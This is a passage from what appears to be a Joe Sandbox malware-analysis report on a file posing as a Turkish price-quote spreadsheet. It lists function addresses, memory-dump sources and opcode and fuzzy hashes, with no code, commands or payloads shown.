                                                  • Opcode Fuzzy Hash: 5f4a79e99154955b33f8b6a25e047823978e3dbb47bf5ef41dd15141eb1f4a3d
                                                  • Instruction Fuzzy Hash: 34D05270519108EBC704CB98E844AACB7BDEB46315F1080AC980A93352CB32AE02CBA0
                                                  Function 05AD99E8 Relevance: .0, Instructions: 17COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2062700922.0000000005AD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05AD0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_5ad0000_TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: badeb1d124d7555906826f29ce6a6c894e48c1522b8a707bec448baa8e91a36b
                                                  • Instruction ID: c4234b89dfb82ead70fb5e3f457f0b63611829874020203f698362ca51d184c8
                                                  • Opcode Fuzzy Hash: badeb1d124d7555906826f29ce6a6c894e48c1522b8a707bec448baa8e91a36b
                                                  • Instruction Fuzzy Hash: 58E01271A0120DEFCB04EFA5EA4165D77B9EB55200F5045A9D408D3305EA755E01A791
                                                  Function 05AD791D Relevance: .0, Instructions: 17COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2062700922.0000000005AD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05AD0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_5ad0000_TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: be4241c19f7ae1cbe57a0bfe606adde4412e952c3bf869fd26885791b20153a8
                                                  • Instruction ID: 4aedcb7af74b74f8962dff75267458692c1f683bf059cef90adf7cfc6dc5ad35
                                                  • Opcode Fuzzy Hash: be4241c19f7ae1cbe57a0bfe606adde4412e952c3bf869fd26885791b20153a8
                                                  • Instruction Fuzzy Hash: 50E0E5789501588FCB14EF19D854B9DBB72FB49344F108699E50FA3362DB705D918F10
                                                  Function 05AD78C1 Relevance: .0, Instructions: 17COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2062700922.0000000005AD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05AD0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_5ad0000_TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 51fa57ebbc281e83f01291a10f6c0b3bb5f0dc62cc98e2157c84315e9dabec3e
                                                  • Instruction ID: 875e0100dab7c82258553486916191f7783e4d4b30ddc81955ca24c29589c4ce
                                                  • Opcode Fuzzy Hash: 51fa57ebbc281e83f01291a10f6c0b3bb5f0dc62cc98e2157c84315e9dabec3e
                                                  • Instruction Fuzzy Hash: BFE012749011158FDB14EF29D4957DC7BB1FB59310F008195D55AB3355DB705D81CF90
                                                  Function 05AD75D3 Relevance: .0, Instructions: 16COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2062700922.0000000005AD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05AD0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_5ad0000_TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: aa6cbc445cf144049ea56e6fe8faaa7c35398cdbf23ba4c060f2799dc3a48b59
                                                  • Instruction ID: 612137e92d77e6a719ecdb2964989bcd07d354adf8dd5cd665c82b17fce04987
                                                  • Opcode Fuzzy Hash: aa6cbc445cf144049ea56e6fe8faaa7c35398cdbf23ba4c060f2799dc3a48b59
                                                  • Instruction Fuzzy Hash: 24E01274D21214CFD714EF25D494BAD7BB2FB56700F2045A9D40E67255CB345E81CF10
                                                  Function 05AD74A4 Relevance: .0, Instructions: 16COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2062700922.0000000005AD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05AD0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_5ad0000_TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 39de63afa265ca6db7ce52739d52248bfd3c7b56d299761f8e3573faaba1fc35
                                                  • Instruction ID: 5806cdc15ff2bbfd2076a923df9ccfa7a29940c2df0e0f1e28413092f943604a
                                                  • Opcode Fuzzy Hash: 39de63afa265ca6db7ce52739d52248bfd3c7b56d299761f8e3573faaba1fc35
                                                  • Instruction Fuzzy Hash: C3E01A78A001589BDB54EF19E4A879C7BB2FB59701F5086E9A00F73351CE305DC69F60
                                                  Function 05AD74FA Relevance: .0, Instructions: 16COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2062700922.0000000005AD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05AD0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_5ad0000_TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 42a0f93645d8cbd6b626f25a3181e98304d44bcc105b0229bcd9740bd5e8a396
                                                  • Instruction ID: b5fb4a4d7eaf129fa77f46d0bc9798651eb5e6da7ea95a7912f2bba58e14048b
                                                  • Opcode Fuzzy Hash: 42a0f93645d8cbd6b626f25a3181e98304d44bcc105b0229bcd9740bd5e8a396
                                                  • Instruction Fuzzy Hash: 9AE01A74A0121A8FCB98EF65E49479CBBB6EB59700F5081AA900E63364DF345DD6CF21
                                                  Function 05AD73E1 Relevance: .0, Instructions: 16COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2062700922.0000000005AD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05AD0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_5ad0000_TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: e5392f9f8a772027e02f57868e16f1ba09147a14c6798af0dec19d720d2a4d9b
                                                  • Instruction ID: 6f6e0cf394fd98f606ec548f6846a81064e39d9d9a6d0fa544f9db462261e6e6
                                                  • Opcode Fuzzy Hash: e5392f9f8a772027e02f57868e16f1ba09147a14c6798af0dec19d720d2a4d9b
                                                  • Instruction Fuzzy Hash: 42E09AB8A022098FDB48EF19D84979DBBB1EF96300F0041AA910A77254CA301E828F62
                                                  Function 05E06660 Relevance: .0, Instructions: 16COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2063553048.0000000005E00000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E00000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_5e00000_TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 86cc31f7c40c3ae0e3d33f7278b357a41781d624af392bce74f23f47d656134c
                                                  • Instruction ID: 45784cd91be8c0f2b9b2fd0d473b215e32f93c150597b0ae1adeb42dbc0f67c2
                                                  • Opcode Fuzzy Hash: 86cc31f7c40c3ae0e3d33f7278b357a41781d624af392bce74f23f47d656134c
                                                  • Instruction Fuzzy Hash: 79D0A73045A208DFC319DBA4A4047AC737DE702246F4030EC944617290DB729D90CB40
                                                  Function 03114D78 Relevance: .0, Instructions: 16COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2043156959.0000000003110000.00000040.00000800.00020000.00000000.sdmp, Offset: 03110000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_3110000_TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: e4c9b3af4b96900534130b218459bb44007898fbc6d43fe4be03a253c4b9b1e3
                                                  • Instruction ID: e5a9e6a429f3f2d17c039dd3ac3ceb9ce58afcfc7743841dc9c1bba481742ba9
                                                  • Opcode Fuzzy Hash: e4c9b3af4b96900534130b218459bb44007898fbc6d43fe4be03a253c4b9b1e3
                                                  • Instruction Fuzzy Hash: FED05E70A0210DEFCF44EFA9EA0095DBBF9EF45300B1141A9D808D7224EB316F059B81
                                                  Function 05E20139 Relevance: .0, Instructions: 15COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2063678264.0000000005E20000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E20000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_5e20000_TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: de249843153e1bc7f71d4d94c044b94ead7ebe817f745f95007807bd1626c631
                                                  • Instruction ID: 6562d18aeb25ee5eeba953f2af868a5cb4bb121c62686f7adefed1622d20eb68
                                                  • Opcode Fuzzy Hash: de249843153e1bc7f71d4d94c044b94ead7ebe817f745f95007807bd1626c631
                                                  • Instruction Fuzzy Hash: 49E08C3050411A8FDB10DB1AE48CBB976A6FB45304F0094A5D05992684DE345E849F11
                                                  Function 05AE3FB8 Relevance: .0, Instructions: 14COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2062772103.0000000005AE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05AE0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_5ae0000_TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: f611d9a1b28cbbbad295640f65d7eb1eae69d9a28d02806de0d3df8ee1e7b4b5
                                                  • Instruction ID: 2ce8ac5b201e8c89a8ff444aed88e9fe3e48411a6534c2ccc25ca783ff87de2c
                                                  • Opcode Fuzzy Hash: f611d9a1b28cbbbad295640f65d7eb1eae69d9a28d02806de0d3df8ee1e7b4b5
                                                  • Instruction Fuzzy Hash: FDD05EB1044308DFCB028FA8E808D587BB4AB09235F258AA2E848CB2A2D331E440CA00
                                                  Function 05AEEB6A Relevance: .0, Instructions: 14COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2062772103.0000000005AE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05AE0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_5ae0000_TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: a0e8f8402c65205ed372e7a15002a10b599515189dfaf490dad1d8975a2d3589
                                                  • Instruction ID: edf23407562188aaa79c7731bdbb769c7e3f960fc486300c676d1767eb815ac6
                                                  • Opcode Fuzzy Hash: a0e8f8402c65205ed372e7a15002a10b599515189dfaf490dad1d8975a2d3589
                                                  • Instruction Fuzzy Hash: 2EE09278A052198BDB64DFA9D44478DBBB2FB68300F10816AD459A3355DB3059818F01
                                                  Function 05AD7280 Relevance: .0, Instructions: 13COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2062700922.0000000005AD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05AD0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_5ad0000_TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 1b8727594e07571af088e4f7d2957dbfe20ce0f86db841e672d793ee0ed1c01f
                                                  • Instruction ID: 1cc8acb68052d0429d0be44f28aba31e21e8bbbb2c3719b884cbb7d8c219f68c
                                                  • Opcode Fuzzy Hash: 1b8727594e07571af088e4f7d2957dbfe20ce0f86db841e672d793ee0ed1c01f
                                                  • Instruction Fuzzy Hash: 0EE09A7494021FCFDB74DF24D945BACBBB0EB55300F0041E5981EA2710EA300A84DF10
                                                  Function 05AD2F6E Relevance: .0, Instructions: 12COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2062700922.0000000005AD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05AD0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_5ad0000_TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: e92dfdfd667c4bccb122d2ee47e83961a374c76ef1341987be82832311384d1d
                                                  • Instruction ID: de10e4b5dd08ae9d92abcbc937436738ba3c65986662e1f7e650067c21bc5723
                                                  • Opcode Fuzzy Hash: e92dfdfd667c4bccb122d2ee47e83961a374c76ef1341987be82832311384d1d
                                                  • Instruction Fuzzy Hash: 67D05EB0552218CFCB14DF69DC59B4A7BFAFF44300F1046A58009A7305DB744E818F41
                                                  Function 0311779F Relevance: .0, Instructions: 11COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2043156959.0000000003110000.00000040.00000800.00020000.00000000.sdmp, Offset: 03110000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_3110000_TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 5eb708566007560d9f85aea95ccd5b733b7d96305bd88fbbbbc90ec1c0902352
                                                  • Instruction ID: 48570726ade9badf4ad1a1c03809ae0e72b573fd242b892c7ab749d87f2cca99
                                                  • Opcode Fuzzy Hash: 5eb708566007560d9f85aea95ccd5b733b7d96305bd88fbbbbc90ec1c0902352
                                                  • Instruction Fuzzy Hash: CBC048B250A7818FDB030A2058A90857FA1AEA722478B00C7D184DA2A3DA2D890A8722
                                                  Function 0311C6D0 Relevance: .0, Instructions: 11COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2043156959.0000000003110000.00000040.00000800.00020000.00000000.sdmp, Offset: 03110000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_3110000_TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 5e8418ea2133a25b4a4073a16c8f35f2c4509ea06739e531d8426697aa93b815
                                                  • Instruction ID: ee65a397bd99a6d895fe70fb0b41c56a459d6a29dc5fccad6fd0c2587fe31128
                                                  • Opcode Fuzzy Hash: 5e8418ea2133a25b4a4073a16c8f35f2c4509ea06739e531d8426697aa93b815
                                                  • Instruction Fuzzy Hash: D4C08C2006020C8BC221B7F4A40C3FC72A86B0830AF800165D40C100268FE0A030CBB6
                                                  Function 057EC3D5 Relevance: .0, Instructions: 10COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2061579609.00000000057E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 057E0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_57e0000_TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 8bc169de4a6410454310e2e257581b9d3e0b94eb5b519c36d2ea2e97c935eb1b
                                                  • Instruction ID: 8ba415819bf7934d698f997e078d2d02e9fc1dfe43fab938c2017091b2e5f779
                                                  • Opcode Fuzzy Hash: 8bc169de4a6410454310e2e257581b9d3e0b94eb5b519c36d2ea2e97c935eb1b
                                                  • Instruction Fuzzy Hash: 5FD067789052548FDB61CF65E984B59B7F1FF49304F0040A9D509A7315C7741D80DF01
                                                  Function 05ADB2A0 Relevance: .0, Instructions: 10COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2062700922.0000000005AD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05AD0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_5ad0000_TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 78cf6966b1c829a2a7c13a1abebf7c07ad2e23a3504adeb421bf9941fdc3f682
                                                  • Instruction ID: 58406c27a4539c33c757c1e4a9ecbe470c3f1fb269dfbf5bd98166d890d56204
                                                  • Opcode Fuzzy Hash: 78cf6966b1c829a2a7c13a1abebf7c07ad2e23a3504adeb421bf9941fdc3f682
                                                  • Instruction Fuzzy Hash: 24C092B5BA4220BAEF6015A08C0FF98B9728700712F495062E1AAE42C6EAD964C24B75
                                                  Function 057ECC0A Relevance: .0, Instructions: 9COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2061579609.00000000057E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 057E0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_57e0000_TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 1242f386e81732c83d53048c8f6af5181742cd6387857b780abc40188c26c622
                                                  • Instruction ID: fc0a37d66e711b92a7e0ef12a8bcdfd9c397f2f67e7e374a227797a584d6e7c0
                                                  • Opcode Fuzzy Hash: 1242f386e81732c83d53048c8f6af5181742cd6387857b780abc40188c26c622
                                                  • Instruction Fuzzy Hash: 94C00276E5001A9A8B00DAD9E4508DCB774EB94321B004066E224A6104D63015268B50
                                                  Function 031108C0 Relevance: .0, Instructions: 9COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2043156959.0000000003110000.00000040.00000800.00020000.00000000.sdmp, Offset: 03110000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_3110000_TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: f0647a9af9c9b80f1b7f218b685c0371cb3bdf618626f28ec51efcb7fb47397e
                                                  • Instruction ID: a38bd72df0e2560dde95be93f9097d65d3ea9eea4f8771e16c2d0ae743fa4f00
                                                  • Opcode Fuzzy Hash: f0647a9af9c9b80f1b7f218b685c0371cb3bdf618626f28ec51efcb7fb47397e
                                                  • Instruction Fuzzy Hash: 8EC0927AC092908FDF06CB5C88582A9BBB0A95E23039902D38444EB271D7666461ABA1
                                                  Function 05AE20B0 Relevance: .0, Instructions: 8COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2062772103.0000000005AE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05AE0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_5ae0000_TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 9145439845d19ed285ef8ed2e2731e53e84310996d3e08af64ba1494253e8755
                                                  • Instruction ID: a5ced1602b898661de329531365079a034e3d75a808f59c5ffcbefa728424f66
                                                  • Opcode Fuzzy Hash: 9145439845d19ed285ef8ed2e2731e53e84310996d3e08af64ba1494253e8755
                                                  • Instruction Fuzzy Hash: 58C0927A140208EFC700DF69E848C85BBB8EF1977171180A1FA088B332C732EC60DA94
                                                  Function 057EC194 Relevance: .0, Instructions: 8COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2061579609.00000000057E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 057E0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_57e0000_TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 3ff1d67bc2e4e25fbb3755c79ae0008d9fcb4b41a8521cd917fa81e5a9396567
                                                  • Instruction ID: 0ebbaac83b591c0da9a3ae99c0db50035fd6c6cdbec4798e28b95242e2852d25
                                                  • Opcode Fuzzy Hash: 3ff1d67bc2e4e25fbb3755c79ae0008d9fcb4b41a8521cd917fa81e5a9396567
                                                  • Instruction Fuzzy Hash: 8FD0E974E04318CFEB65CF25D855B99B7B1AB15315F0150D9954DA2251D7341D848F11
                                                  Function 05AE61A8 Relevance: .0, Instructions: 7COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2062772103.0000000005AE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05AE0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_5ae0000_TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: ef771b67f66ac798b39cab361743046ff902de7545cc0d528420f786545e7ab1
                                                  • Instruction ID: 60452f772363a82e58eac414e62d801ab8ba4fc9ef82e5f508330686cbedf6f7
                                                  • Opcode Fuzzy Hash: ef771b67f66ac798b39cab361743046ff902de7545cc0d528420f786545e7ab1
                                                  • Instruction Fuzzy Hash: A6B09232100208AB8A009A84E904895BF69AB986007808025B6090A1218B33B822DB94
                                                  Function 03110888 Relevance: .0, Instructions: 6COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2043156959.0000000003110000.00000040.00000800.00020000.00000000.sdmp, Offset: 03110000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_3110000_TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 34d8c6b0724aabdfd76f71441601f689b3a89e048bbf8977bad0cf10a8479efb
                                                  • Instruction ID: 84d079b46548d0a6f26ca71f1d19928e3b80784d377170ecc329ace1e969438c
                                                  • Opcode Fuzzy Hash: 34d8c6b0724aabdfd76f71441601f689b3a89e048bbf8977bad0cf10a8479efb
                                                  • Instruction Fuzzy Hash: CBA01132000208CB8A223BA0B80C00C3BACEB28222BA000A2A00E880288A222A008B80
                                                  Function 05ADE1AB Relevance: .0, Instructions: 5COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2062700922.0000000005AD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05AD0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_5ad0000_TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 5000af1b98debc5990a58ce3abcedf8575f69cb5eb0c1dfd5b2bf08121a521c9
                                                  • Instruction ID: 098e792c0997fe2a3b0af5fa077e3c9da33f90e5a62d10935b19aecb3f2772b2
                                                  • Opcode Fuzzy Hash: 5000af1b98debc5990a58ce3abcedf8575f69cb5eb0c1dfd5b2bf08121a521c9
                                                  • Instruction Fuzzy Hash: 93B012354046006E8B05C610D94B8197921D7A1302710CC34B00081198CF30C811F5A0
                                                  Function 031108B0 Relevance: .0, Instructions: 5COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2043156959.0000000003110000.00000040.00000800.00020000.00000000.sdmp, Offset: 03110000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_3110000_TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 58cb1edfb9c43e5d8f603956e5be6cf953def5a66a2be7482e942a5ef345f78b
                                                  • Instruction ID: 842668d5d24bf796539c3275cb41bd510803da5766385735eb8cc5d42608c88b
                                                  • Opcode Fuzzy Hash: 58cb1edfb9c43e5d8f603956e5be6cf953def5a66a2be7482e942a5ef345f78b
                                                  • Instruction Fuzzy Hash: EF90223200820C8F088023823008280330C82000333800002A00C002000AA220000280
                                                  Function 03112F8C Relevance: .0, Instructions: 5COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2043156959.0000000003110000.00000040.00000800.00020000.00000000.sdmp, Offset: 03110000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_3110000_TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 2d5d35bf655b9e5dcf77ae5f043c2723a8cec711f97de4f6ed57009f3e9ff6d3
                                                  • Instruction ID: 9e159c601999709c0fcb120ab93c07a3890ecf2b5b5693ba09a411bf386236ef
                                                  • Opcode Fuzzy Hash: 2d5d35bf655b9e5dcf77ae5f043c2723a8cec711f97de4f6ed57009f3e9ff6d3
                                                  • Instruction Fuzzy Hash: A6B04870C051288BCB648F549504398BAF0AB48201F0240A6840DA6210D73009818B61
                                                  Function 03117A92 Relevance: .0, Instructions: 2COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2043156959.0000000003110000.00000040.00000800.00020000.00000000.sdmp, Offset: 03110000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_3110000_TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: c21701dfad7c2b57c4ecbd9143d4cb274c759e25e323194d1c4f3b72bcc9a498
                                                  • Instruction ID: bcddf5a8b62428b5fa0a64124a221fde816c8956ed3b01b9c764fe17822ffa9b
                                                  • Opcode Fuzzy Hash: c21701dfad7c2b57c4ecbd9143d4cb274c759e25e323194d1c4f3b72bcc9a498
                                                  • Instruction Fuzzy Hash:

                                                  Non-executed Functions

                                                  Function 03118530 Relevance: 2.7, Strings: 2, Instructions: 172COMMON
                                                  Download Yara Rule
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2043156959.0000000003110000.00000040.00000800.00020000.00000000.sdmp, Offset: 03110000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_3110000_TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: 4']q$4']q
                                                  • API String ID: 0-3120983240
                                                  • Opcode ID: 9105cb2bfb0e1d6cf254a78066e121cdbb0517ae54fccfb42118cb190c8020bf
                                                  • Instruction ID: 1b3603e4efd26004a7c2ab6259a8682b7e61dccc69ab81d1be1ac87a990ff1f3
                                                  • Opcode Fuzzy Hash: 9105cb2bfb0e1d6cf254a78066e121cdbb0517ae54fccfb42118cb190c8020bf
                                                  • Instruction Fuzzy Hash: EB71FCB09426498FD748DFABE95069E7BF6FFD9700F14C539D0089B268DB385846CB80
                                                  Function 057E5F48 Relevance: 2.7, Strings: 2, Instructions: 165COMMON
                                                  Download Yara Rule
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2061579609.00000000057E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 057E0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_57e0000_TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: &$\
                                                  • API String ID: 0-1353981753
